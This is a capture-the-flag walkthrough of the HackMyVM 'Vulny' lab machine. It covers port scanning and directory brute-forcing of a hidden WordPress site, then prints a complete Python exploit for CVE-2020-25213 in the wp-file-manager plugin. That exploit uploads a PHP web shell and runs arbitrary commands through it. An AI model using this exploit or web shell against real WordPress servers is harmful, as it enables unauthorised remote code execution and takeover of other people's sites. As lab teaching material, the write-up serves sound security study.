Walkthrough HackMyVm - Vulny

Here I will make a writeup of the Vulny machine on the HackMyVm platform and this is an easy rated VM, if you are interested you can click the link here. Let's start.

Reconnaissance

As always the first thing i do is port scanning. and at this point nmap only find one open TCP port that is HTTP (80):

$ nmap -sC -sV -sT 192.168.1.38
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-09 03:13 EST
Nmap scan report for 192.168.1.38
Host is up (0.0014s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

Website

The website display provided is only the default display, so we need to look for a hidden path or file using bruteforce directory tools such as dirb, dirsearch, etc.

Directory Bruteforce

─$ dirsearch -u http://192.168.1.38/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                     
 (_||| _) (/_(_|| (_| )                                                                                                                                              
                                                                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/

[04:12:21] Starting: 
[04:12:49] 200 -   11KB - /index.html                                       
[04:12:51] 301 -  317B  - /javascript  ->  http://192.168.1.38/javascript/  
[04:13:10] 301 -  313B  - /secret  ->  http://192.168.1.38/secret/          
              
Task Completed

Here we find 2 directories, namely /javascript and /secret. If we access /javascript the response given is Forbidden or not permitted. but in the /secret directory you can access it and find a note.

From this information, it is known that there is an endpoint config from WordPress which contains a password/username. but this is quite strange because if we use wappalyzer or wpscan we find no indication that the web server uses wordpress.

Next, we try to bruteforce the directory again using dirsearch specifically for the secret path.

$ dirsearch -u http://192.168.1.38/secret/ --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                     
 (_||| _) (/_(_|| (_| )                                                                                                                                              
                                                                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.38/secret/

[04:32:45] Starting: 
[04:33:29] 200 -    7KB - /secret/readme.html                               
[04:33:42] 301 -  322B  - /secret/wp-admin  ->  http://192.168.1.38/secret/wp-admin/
[04:33:42] 301 -  324B  - /secret/wp-content  ->  http://192.168.1.38/secret/wp-content/
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/akismet.php    
[04:33:42] 500 -  610B  - /secret/wp-content/plugins/akismet/admin.php      
[04:33:42] 200 -    2KB - /secret/wp-content/                               
[04:33:42] 200 - 1003B  - /secret/wp-content/upgrade/                       
[04:33:42] 200 -    1KB - /secret/wp-content/uploads/                       
[04:33:42] 301 -  325B  - /secret/wp-includes  ->  http://192.168.1.38/secret/wp-includes/
[04:33:43] 500 -    3KB - /secret/wp-admin/setup-config.php                 
[04:33:43] 500 -    0B  - /secret/wp-includes/rss-functions.php             
                                                                        
Task Completed

From these results, 3 paths were found, namely;
/wp-admin = The response given is the same as /secret

/wp-content = Response 200

/wp-includes = Forbidden

Next, we can focus on /wp-content and in it there is the /uploads directory and if we access it we find that this website uses the wp-file-manager plugin.

Web Exploitation

If we access http://192.168.1.38/secret/wp-content/uploads/2020/10/ You will find the version of wp-file-manager, namely 6.0. and this version vulnerable !

We need to download the exploit and make small changes to the location of the url by adding /secret.

#!/usr/bin/env

# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]

import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig,frame):
	print ("[!]Saliendo")
	sys.exit(1)

signal.signal(signal.SIGINT,handler)

def commandexec(command):

	exec_url = url+"/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
	params = {
		"cmd":command
	}

	r=requests.get(exec_url,params=params)

	soup = BeautifulSoup(r.text, 'html.parser')
	text = soup.get_text()

	print (text)
def exploit():

	global url

	url = sys.argv[1]
	command = sys.argv[2]
	upload_url = url+"/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

	headers = {
			'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
			'Connection': "close" 
	}

	payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

	try:
		r=requests.post(upload_url,data=payload,headers=headers)
		#pprint(r.json())
		commandexec(command)
	except:
		print("[!] Algo ha salido mal...")

def help():

	print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
	print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")


if __name__ == '__main__':

	if len(sys.argv) != 3:
		help()

	else:
		exploit()